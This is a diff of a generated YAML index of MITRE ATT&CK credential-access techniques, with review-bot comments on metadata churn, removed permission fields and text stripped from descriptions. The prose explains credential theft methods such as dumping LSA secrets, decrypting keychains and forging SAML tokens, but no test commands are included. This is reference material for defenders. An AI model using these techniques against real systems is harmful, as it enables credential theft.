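Review bot: Beneath the key reordering, the one semantic change to T1556.003 in this hunk is the removal of `x_mitre_permissions_required: - root`, with `revoked: false` and `x_mitre_deprecated: false` added; that removal should be called out in the commit description so downstream consumers filtering on required permissions know the field is gone rather than assuming the object is unchanged. Note also that the detection text at the line reading "Monitor PAM configuration and module paths (ex: /etc/pam.d/" carries the same stray line break as the description above.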
T1056.001:
@@ -43741,12 +44403,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43775,6 +44436,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -43786,18 +44448,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -43824,14 +44486,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests: []
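Review bot: For T1110.001 (and T1539 in the next hunks) `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are moved from after `object_marking_refs` to sit after `kill_chain_phases` and `x_mitre_is_subtechnique`, while every other object in this patch keeps them after `object_marking_refs`. The values are unchanged, so this is pure churn from non-deterministic key ordering; suggest sorting keys (or fixing the emission order) in the generator so the same field lands in the same place for every technique.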
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43955,12 +44614,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43975,10 +44633,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -43986,14 +44645,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -44036,14 +44695,11 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests: []
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -44098,14 +44754,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -44156,14 +44811,13 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests: []
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -44197,8 +44851,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -44215,11 +44869,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -44237,7 +44890,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -44254,10 +44907,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -44281,46 +44934,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
@@ -44341,65 +44960,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -44408,6 +45024,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44415,31 +45034,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
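Review bot: `- x_mitre_permissions_required:` / `- - SYSTEM` is dropped from T1003.004 with no structured field replacing it, so the only remaining statement of the SYSTEM requirement is the free-text description ("Adversaries with SYSTEM access to a host"); any test selection or reporting that filtered on `x_mitre_permissions_required` should be checked before merge. The same hunk carries the citation `+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,` with a stray `1` before `Windows`; it is inherited from upstream and this file is generated, so the fix belongs in the source data rather than a hand edit here. The `Azure AD` → `Entra ID` wording change in the T1606.002 description at the end of the hunk is consistent with the platform rename elsewhere in the patch.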
@@ -44452,14 +45103,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -44500,14 +45151,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
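Review bot: the T1003.007 description context line at the end of this hunk reads `/proc//maps` and `/proc//mem`, i.e. the PID placeholder between the slashes is missing, which is what happens when angle-bracketed text in the upstream description is treated as markup and stripped. The same pattern shows elsewhere in this patch as a value left dangling before a bare `,` or `.` on the following line (the `NotOnOrAfter`, `AccessTokenLifetime` and `LifetimeTokenPolicy` names in the T1606.002 description, and the `Secrets` registry path in T1003.004). Worth confirming the generated file itself reads this way and, if so, having the generator escape or backtick such spans instead of dropping them, as it already does for `securityd` in T1555.002; not introduced by this PR, but this regeneration is the natural place to fix it.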
@@ -44570,81 +45218,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -44729,12 +45375,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
